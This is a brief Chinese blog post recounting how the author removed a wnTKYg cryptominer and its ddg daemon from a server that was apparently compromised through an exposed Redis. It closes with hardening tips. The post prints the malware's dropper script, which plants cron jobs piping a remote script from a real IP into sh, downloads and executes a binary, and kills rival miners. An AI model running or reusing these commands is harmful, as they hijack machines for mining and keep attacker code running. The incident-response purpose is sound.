清除wnTKYg 挖矿工木马的过程

Posted 2020-10-17 Novicelong

*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh
*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh

发现服务器CPU占用率超100,先不要着急删除文件，确定文件目录

查看挖矿脚本

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh" > /var/spool/cron/root
echo "*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh" > /var/spool/cron/crontabs/root
echo "*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh" >> /var/spool/cron/crontabs/root

if [ ! -f "/tmp/ddg.2021" ]; then
    curl -fsSL --compressed http://218.248.40.228:8443/2021/ddg.$(uname -m) -o /tmp/ddg.2021
fi

if [ ! -f "/tmp/ddg.2021" ]; then
    wget -q http://218.248.40.228:8443/2021/ddg.$(uname -m) -O /tmp/ddg.2021
fi

chmod +x /tmp/ddg.2021 && /tmp/ddg.2021


ps auxf | grep -v grep | grep Circle_MI | awk \'{print $2}\' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk \'{print $2}\' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk \'{print $2}\' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk \'{print $2}\' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk \'{print $2}\' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk \'{print $2}\' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk \'{print $2}\' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk \'{print $2}\' | kill

根据上边的脚本清楚定时任务

top查看 CPU299%

ps -ef | grep  wnTKYg

发现在 tmp目录下生成两个文件imWBR1\\wnTKYg: 删除这两个文件并把进程kill掉，

观察两分钟后发现还会自动启动

继续检查和网上搜索，发现一般这个挖矿还有守护进程一般命名为，ddg*   ,ps  -ef | grep ddg 发现果然有这个，查看他的启动目指向/tmp下

去tmp下删除相关文件并kill掉进程，top继续观察，，，，终于解决。。。。

 

网上查询的贴都说是因为redis，未加密引起的。以后注意，对redis进行指定内网IP请求，防火墙限制挖矿地址出入屏蔽掉，对系统文件和应用的接口和权限也要加固。

欢迎随时沟通